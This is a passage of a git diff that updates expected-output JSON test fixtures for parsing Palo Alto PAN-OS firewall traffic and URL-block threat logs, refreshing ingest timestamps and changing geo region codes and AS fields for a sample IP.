 },
 "rule": {
 "name": "rule1"
@@ -126,7 +121,7 @@
 },
 "event": {
 "duration": 0,
- "ingested": "2021-12-09T13:43:44.429582400Z",
+ "ingested": "2021-12-14T14:50:40.724497350Z",
 "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
 "created": "2012-10-30T09:46:12.000-04:00",
 "timezone": "America/New_York",
diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json
index a84a1cb8b94..96a3d3fe0d6 100644
--- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json
+++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log-expected.json
@@ -11,22 +11,17 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "ip": "175.16.199.1"
 },
@@ -157,7 +152,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-09T13:43:44.691648800Z",
+ "ingested": "2021-12-14T14:50:40.980233955Z",
 "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:44:36.000-05:00",
 "timezone": "America/New_York",
@@ -185,22 +180,17 @@
 },
 "geo": {
 "continent_name": "Asia",
- "region_iso_code": "CN-JL",
+ "region_iso_code": "CN-22",
+ "city_name": "Changchun",
 "country_iso_code": "CN",
 "country_name": "China",
 "name": "United States",
- "region_name": "Jilin",
+ "region_name": "Jilin Sheng",
 "location": {
 "lon": 125.3228,
 "lat": 43.88
 }
 },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
 "port": 443,
 "ip": "175.16.199.1"
 },
@@ -331,7 +321,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691658700Z", + "ingested": "2021-12-14T14:50:40.980237054Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -359,22 +349,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -505,7 +490,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691665300Z", + "ingested": "2021-12-14T14:50:40.980237615Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -533,22 +518,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -679,7 +659,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691671600Z", + "ingested": "2021-12-14T14:50:40.980238006Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -707,22 +687,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -853,7 +828,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691678200Z", + "ingested": "2021-12-14T14:50:40.980238394Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -881,22 +856,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1027,7 +997,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691684500Z", + "ingested": "2021-12-14T14:50:40.980238746Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1055,22 +1025,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1201,7 +1166,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691690800Z", + "ingested": "2021-12-14T14:50:40.980239098Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1229,22 +1194,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1375,7 +1335,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691697200Z", + "ingested": "2021-12-14T14:50:40.980239515Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1403,22 +1363,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1549,7 +1504,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691703400Z", + "ingested": "2021-12-14T14:50:40.980239871Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1577,22 +1532,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1723,7 +1673,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691709700Z", + "ingested": "2021-12-14T14:50:40.980240235Z", "original": "Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1751,22 +1701,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -1897,7 +1842,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691716Z", + "ingested": "2021-12-14T14:50:40.980240583Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -1925,22 +1870,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2071,7 +2011,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691721800Z", + "ingested": "2021-12-14T14:50:40.980241146Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2099,22 +2039,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2245,7 +2180,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691725600Z", + "ingested": "2021-12-14T14:50:40.980241510Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2273,22 +2208,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2419,7 +2349,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691730700Z", + "ingested": "2021-12-14T14:50:40.980241862Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2447,22 +2377,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2593,7 +2518,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691736400Z", + "ingested": "2021-12-14T14:50:40.980242212Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:36.000-05:00", "timezone": "America/New_York", @@ -2621,22 +2546,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2767,7 +2687,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691741900Z", + "ingested": "2021-12-14T14:50:40.980242552Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -2795,22 +2715,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -2941,7 +2856,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691746200Z", + "ingested": "2021-12-14T14:50:40.980243017Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -2969,22 +2884,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3115,7 +3025,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691751400Z", + "ingested": "2021-12-14T14:50:40.980243356Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -3143,22 +3053,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3289,7 +3194,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691757800Z", + "ingested": "2021-12-14T14:50:40.980243711Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -3317,22 +3222,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3463,7 +3363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691761900Z", + "ingested": "2021-12-14T14:50:40.980244067Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3491,22 +3391,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, 
@@ -3637,7 +3532,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691766900Z", + "ingested": "2021-12-14T14:50:40.980244406Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3665,22 +3560,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, 